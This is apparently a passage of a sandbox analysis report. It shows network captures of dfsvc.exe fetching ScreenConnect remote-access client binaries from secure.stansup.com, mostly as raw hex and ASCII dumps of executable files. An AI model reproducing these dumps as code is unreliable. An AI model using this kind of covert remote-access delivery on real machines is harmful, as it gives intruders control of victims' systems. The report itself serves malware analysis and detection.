                                                                                                                                                                                                                                                      2024-10-25 17:27:43 UTC2775INData Raw: 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0f
                                                                                                                                                                                                                                                      Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      11192.168.2.104972979.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:44 UTC93OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:27:44 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 548352
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:43 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:44 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 69 42 17 f7 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 56 08 00 00 06 00 00 00 00 00 00 c6 70 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 84 a2 08 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELiB" 0Vp @
                                                                                                                                                                                                                                                      2024-10-25 17:27:44 UTC16384INData Raw: 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 0e 07 00 06 04 6f 0e 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 0e 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 0e 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72 01 00 0a 2a 06 2c 43 02 7b 76 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 77 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 03 6f 0e 07 00 06 7d 78 01 00 0a 02 28 2d 00 00 2b 7d 76 01
                                                                                                                                                                                                                                                      Data Ascii: (++,}n{n*>oo*>(o}p*03=-*(qo{p_,B{r,(stsu(,+&}p|r*o{p3{r*,C{v,(swsu(,+&o}x(-+}v
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b2 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d1 05 00 04 25 2d 17 26 7e d0 05 00 04 fe 06 a0 0e 00 06 73 cb 02 00 0a 25 80 d1 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e2 04 00 06 28 80 00 00 2b 26 2a 00 1b 30 01 00 1a 00 00 00 75 00 00 11 02 0a 06 28 2c 01 00 0a 03 6f 08 02 00 0a 0b de 07 06 28 2d 01 00 0a dc 07 2a 00 00 01 10 00 00 02 00 08 00 09 11 00 07 00 00 00 00 3a 02 03
                                                                                                                                                                                                                                                      Data Ascii: s+&s+s+rpsz*Z(<(*~%-&~s%(+*0%(-*o(-*:((+&*0u(,o(-*:
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 0a 03 6f 8c 01 00 0a 7e e3 05 00 04 25 2d 17 26 7e d0 05 00 04 fe 06 b2 0e 00 06 73 9f 02 00 0a 25 80 e3 05 00 04 28 b3 00 00 2b 28 67 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 93 0f 00 06 25 02 7d a0 06 00 04 2a ae 02 16 16 16 16 73 20 03 00 06 7e cf 05 00 04 25 2d 13 26 14 fe 06 3d 03 00 06 73 3b 04 00 0a 25 80 cf 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 45 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 28 d5 00 00 2b 28 45 05 00 06 28 d6 00 00 2b 2a 3a 05 2c 09 02 03 04 28 d7 00 00 2b 2a 02 2a 00 00 13 30 02 00 13 00 00 00 33 00 00 11 02 28 d5 00 00 2b 03 28 d5 00 00
                                                                                                                                                                                                                                                      Data Ascii: o~%-&~s%(+(g(r+*n((*>s%}*s ~%-&=s;%(+*(+(+-j+j(E(+*&f__`*v(+(+(+(E(+*:,(+**03(+(
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 72 10 14 00 70 a2 25 1b 02 28 51 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 53 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 55 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 57 07 00 06 28 4f 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 59 07 00 06 0b 12 01 fe 16 29 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 5b 07 00 06 0c 12 02 fe 16 2a 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 5d 07 00 06 0d 12 03 28 2f 05 00 0a a2 28 2a 02 00 0a 2a 1e 02 28 4c 07 00 06 2a 1e 02 7b a1 02 00 04 2a 22 02 03 7d a1 02 00 04 2a 00 00 13 30 02 00 1f 00 00 00 5a 00 00 11 72 90 14 00 70 02 28 61 07 00 06 0a 12 00 fe 16 c1 00 00
                                                                                                                                                                                                                                                      Data Ascii: rp%(Q(%r"p%(S(%r4p%(U(%r2p%(W(O%rHp%(Y)oC%rhp%([*oC%rp%(](/(**(L*{*"}*0Zrp(a
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 1b 0c 02 7c d7 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d7 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d7 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 2f 0a 00 06 02 03 7d d8 03 00 04 02 04 7d d9 03 00 04 2a 1e 02 7b d8 03 00 04 2a 1e 02 7b d9 03 00 04 2a 5a 03 02 28 37 0a 00 06 5a 1e 28 12 04 00 06 02 28 38 0a 00 06 58 2a 86 02 03 04 28 36 0a 00 06 02 05 75 95 00 00 02 7d da 03 00 04 02 05 75 94 00 00 02 7d db 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b da 03 00 04 28 0f 04 00 06 02 7b db 03 00 04 28 0f 04 00 06 2a 00 00 13 30 07 00 e6 00 00 00 52 01 00 11 02 04 28 39 0a 00 06 0a 02 28 38 0a 00 06 16 fe 03 0b 02 7b da 03 00 04 2c 67 05 06 5a 0c 02 08 16 28 32
                                                                                                                                                                                                                                                      Data Ascii: |(+3*0)Q{(-tO|(+3*V(/}}*{*{*Z(7Z((8X*(6u}u}*(c,{({(*0R(9(8{,gZ(2
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 07 04 07 6f 03 0c 00 06 02 05 07 6f 02 0c 00 06 28 03 09 00 06 6f 06 0c 00 06 28 fb 0b 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3b 04 00 04 02 04 7d 3c 04 00 04 02 05 7d 3d 04 00 04 02 0e 04 7d 3e 04 00 04 02 0e 05 7d 3f 04 00 04 2a 1e 02 7b 3b 04 00 04 2a 1e 02 7b 3c 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 00 0a 2d 1e 28 64 01 00 0a d0 81 00 00 1b 28 3c 01 00 0a 28 0c 05 00 06 6f 8c 0b 00 06 80 1b 07 00 0a de 07 06 28 2d 01 00 0a dc 7e 1b 07 00 0a 2a 00 01 10 00 00 02 00 13 00 27 3a 00 07 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: oo(o(o-,o*29(<};}<}=}>}?*{;*{<*{=*{>*{?*0G*~-:~(,~-(d(<(o(-~*':
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 a5 0d 00 06 80 30 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 31 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 ae 0d 00 06 80 36 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 56 02 00 06 2a 22 03 04 28 5c 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 39 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 2f 02 00 06 2a 00 00 00 13 30 03 00 1b 00 00 00 b1 01 00 11 02 7b 39 05 00 04 03 16 28 f0 01 00 2b 0a 12 00 28 7b 08 00 0a 6f 31 02 00 06 2a 36 02 7b 39 05 00 04 03 6f 33 02 00 06 2a 00 00 00 13 30 02 00 1a 00 00 00 b2 01 00 11 02 7b 39
                                                                                                                                                                                                                                                      Data Ascii: sjz(<*.s0*(<*2{1oB*(<*6{o{*(<*6{o{*.s6*(<*"(V*"(\*(<*0{9(+d(zo/*0{9(+({o1*6{9o3*0{9
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 04 10 00 06 80 23 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 1b 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 08 10 00 06 80 26 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0b 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 4b 0b 00 06 2a 3a 0f 01 fe 16 4b 01 00 02 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 2b 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c1 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a 2e 73 13 10 00 06 80 32 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 36 03 03 28 1a 02 00 2b 73 32 0a 00 0a 2a 2a 03 6f 33 0a 00 0a 14 fe 03 2a 5e 03 03 6f 34 0a 00 0a 28 bc 01 00 2b 28 f8 0b 00 06 73 35
                                                                                                                                                                                                                                                      Data Ascii: {#(1*(<*J{'{((1*.s#*(<*o*oC*.s&*(<*oC*.s(*(<*"(K*:KoC*.s+*(<*:oC*(<*.s2*(<*6(+s2**o3*^o4(+(s5
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 27 3d 01 00 6d 00 9a 01 fe 02 09 01 10 00 e6 4f 01 00 27 3d 01 00 6d 00 9e 01 06 03 09 01 10 00 d9 bb 00 00 27 3d 01 00 6d 00 a0 01 14 03 09 01 10 00 96 3a 01 00 27 3d 01 00 6d 00 a2 01 1f 03 09 01 10 00 9c ff 00 00 27 3d 01 00 6d 00 a6 01 46 03 81 01 10 00 cc 3a 01 00 27 3d 01 00 35 00 a9 01 5a 03 01 20 10 00 0e e3 00 00 27 3d 01 00 35 00 ab 01 63 03 01 20 10 00 4d 34 01 00 27 3d 01 00 35 00 ae 01 7b 03 01 00 10 00 e9 7f 00 00 27 3d 01 00 35 00 b1 01 80 03 81 00 10 00 cf fc 00 00 27 3d 01 00 3c 03 b2 01 8a 03 01 00 10 00 8d fe 00 00 27 3d 01 00 24 03 b4 01 95 03 01 00 10 00 96 fd 00 00 27 3d 01 00 24 03 b6 01 99 03 01 00 10 00 fa 7f 00 00 27 3d 01 00 35 00 b6 01 9d 03 01 00 10 00 56 91 00 00 27 3d 01 00 35 00 b7 01 a7 03 01 00 10 00 47 91 00 00 27 3d 01
                                                                                                                                                                                                                                                      Data Ascii: '=mO'=m'=m:'=m'=mF:'=5Z '=5c M4'=5{'=5'=<'=$'=$'=5V'=5G'=


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      12192.168.2.104973079.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:48 UTC102OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:27:48 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 600864
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:47 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:48 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 08 e6 df 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fa 08 00 00 06 00 00 00 00 00 00 8a 12 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 ca be 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ `@
                                                                                                                                                                                                                                                      2024-10-25 17:27:48 UTC16384INData Raw: 2c 00 00 11 73 af 07 00 06 0a 06 02 7d 15 03 00 04 28 74 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 75 01 00 0a 28 76 01 00 0a 16 8d 11 00 00 01 28 77 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 ce 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e aa 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 29 07 00 06 73 cf 01 00 0a 25 80 aa 02 00 04 28 33 00 00 2b 6f d0 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d1 01 00 0a 7d 17 03 00 04 11 04 7b 17 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 17 03 00 04 6f 18 03 00 06 28 39 06 00 06 13 06 11 04 7b 17 03 00 04 6f 2c 03 00 06 28 4d 06 00 06 13 07 11 04 7b 17 03 00 04 6f 2d 03 00 06 28 4d 06 00 06 13 08 11 04 7b 17 03 00 04 6f 18 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a 11 0e 13 09 11 05 7b 74 02 00 04 2d 21
                                                                                                                                                                                                                                                      Data Ascii: ,s}(t,rp(u(v(w}H((((~%-&~)s%(3+o8$o}{(,+{o(9{o,(M{o-(M{o(%o{t-!
                                                                                                                                                                                                                                                      2024-10-25 17:27:48 UTC16384INData Raw: 04 6f 0e 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 16 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f bb 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 16 03 00 0a 74 9b 00 00 01 17 6f 17 03 00 0a 26 02 7b 54 00 00 04 14 6f 7a 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0e 07 00 06 8c b6 00 00 02 a2 28 09 03 00 0a 02 7b 54 00 00 04 6f 0e 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f bb 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0c 03 00 0a 6f 0e 02 00 0a 2b 10 02 7b 5a 00
                                                                                                                                                                                                                                                      Data Ascii: o.{To*0b{To,M{Z(o{To{T{Toto&{Toz(<*(<*0Grp%3%{To({To..'+5{Z(o-"(so+{Z
                                                                                                                                                                                                                                                      2024-10-25 17:27:48 UTC16384INData Raw: 70 28 b0 00 00 2b 7d 89 00 00 04 2a 13 30 04 00 70 00 00 00 62 00 00 11 73 3f 08 00 06 0a 06 02 7d 94 03 00 04 02 03 28 28 04 00 0a 06 02 28 29 04 00 0a 28 b1 00 00 2b 7d 93 03 00 04 02 28 29 04 00 0a 26 02 28 2a 04 00 0a 6f 2b 04 00 0a 02 28 2a 04 00 0a 02 7b 89 00 00 04 06 fe 06 40 08 00 06 73 2c 04 00 0a 28 b2 00 00 2b 06 fe 06 41 08 00 06 73 2d 04 00 0a 28 b3 00 00 2b 28 b4 00 00 2b 6f 2e 04 00 0a 2a c2 02 28 2f 04 00 0a 02 7e 30 04 00 0a 28 31 04 00 0a 02 20 02 60 00 00 17 28 32 04 00 0a 02 02 fe 06 e0 01 00 06 73 33 04 00 0a 28 34 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02
                                                                                                                                                                                                                                                      Data Ascii: p(+}*0pbs?}((()(+}()&(*o+(*{@s,(+As-(+(+o.*(/~0(1 `(2s3(4*{*"}*{*"}*{*"}*{*"}*
                                                                                                                                                                                                                                                      2024-10-25 17:27:49 UTC16384INData Raw: 6f c7 02 00 06 2a 7a 02 7b ef 00 00 04 2c 0f 02 28 ab 02 00 06 2c 07 02 28 ab 02 00 06 2a 02 28 94 02 00 06 2a 00 00 00 13 30 02 00 51 00 00 00 92 00 00 11 02 28 67 05 00 0a 2d 1d 02 28 a0 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a0 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a7 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a7 02 00 06 2a 02 6f 1e 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 92 00 00 11 02 28 67 05 00 0a 2d 1d 02 28 9e 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 9e 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a5 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a5 02 00 06 2a 02 6f 1d 04 00 0a 2a d6 02 28 67 05 00 0a 2d 0f 02 28 a2 02 00 06 2c 07 02 28 a2 02 00 06 2a 02 7b
                                                                                                                                                                                                                                                      Data Ascii: o*z{,(,(*(*0Q(g-((h,(*{,((h,(*o*0Q(g-((h,(*{,((h,(*o*(g-(,(*{
                                                                                                                                                                                                                                                      2024-10-25 17:27:49 UTC16384INData Raw: 03 7d 37 01 00 04 2a 00 13 30 05 00 64 00 00 00 00 00 00 00 02 03 04 05 0e 04 28 7c 03 00 06 02 73 0b 06 00 0a 7d 38 01 00 04 02 02 fe 06 87 03 00 06 73 82 01 00 0a 28 0c 06 00 0a 02 7b 38 01 00 04 02 fe 06 88 03 00 06 73 82 01 00 0a 6f 0d 06 00 0a 02 02 fe 06 89 03 00 06 73 9e 01 00 0a 28 9f 01 00 0a 02 02 fe 06 8a 03 00 06 73 82 01 00 0a 28 0e 06 00 0a 2a 32 02 7b 38 01 00 04 6f 0f 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 10 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c3 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 50 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c3 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 50 01 00 2b 0a 06 07 33
                                                                                                                                                                                                                                                      Data Ascii: }7*0d(|s}8s({8sos(s(*2{8o*6{8o*0){:(t|:(P+3*0){:(t|:(P+3
                                                                                                                                                                                                                                                      2024-10-25 17:27:49 UTC16384INData Raw: 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 b3 07 00 0a 06 7b 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 b4 07 00 0a 1f 20 17 28 b5 07 00 0a 7d 3b 05 00 04 06 06 7b 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 a1 04 00 0a 1f 20 73 b6 07 00 0a 7d 3d 05 00 04 06 14 7d 3c 05 00 04 02 06 7b 39 05 00 04 06 fe 06 82 0a 00 06 73 96 07 00 0a 28 9a 01 00 2b de 39 06 7b 3b 05 00 04 2c 0b 06 7b 3b 05 00 04 6f 22 00 00 0a dc 06 7b 3a 05 00 04 2c 0b 06 7b 3a 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 66 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 b0 01 00 06 02 20 16 22 00 00 17 28 32 04 00 0a 02
                                                                                                                                                                                                                                                      Data Ascii: 9o({9o( (};{9o( s}=}<{9s(+9{;,{;o"{:,{:o",o"(f&*4iA5$0J( "(2
                                                                                                                                                                                                                                                      2024-10-25 17:27:49 UTC16384INData Raw: 05 00 06 80 0d 02 00 04 1f 10 1f 10 28 38 05 00 06 80 0e 02 00 04 1f 18 1f 18 28 38 05 00 06 80 0f 02 00 04 1f 21 1f 10 28 38 05 00 06 80 10 02 00 04 1f 20 1f 10 28 38 05 00 06 80 11 02 00 04 20 c8 00 00 00 28 37 05 00 06 80 12 02 00 04 d0 88 00 00 02 28 bf 00 00 0a 6f 96 08 00 0a 6f 97 08 00 0a 7e 83 05 00 04 fe 06 d9 0a 00 06 73 5f 01 00 0a 28 d2 01 00 2b 7e 83 05 00 04 fe 06 da 0a 00 06 73 5f 01 00 0a 28 21 00 00 2b 0c 28 98 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 44 05 00 06 28 c6 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 98 08 00 0a 02 6f 44 05 00 06 28 c6 04 00 06 7e aa 00 00 0a 02 6f b2 03 00 0a 6f 99 08 00 0a 2a 2e 28 c5 04 00 06 6f 61 05 00 06 2a 2e 28 c5 04 00 06 6f 47 05 00 06 2a 2e 28 c5 04 00 06 6f 4d 05
                                                                                                                                                                                                                                                      Data Ascii: (8(8!(8 (8 (7(oo~s_(+~s_(!+(%-&(oD(*~**(oD(~oo*.(oa*.(oG*.(oM
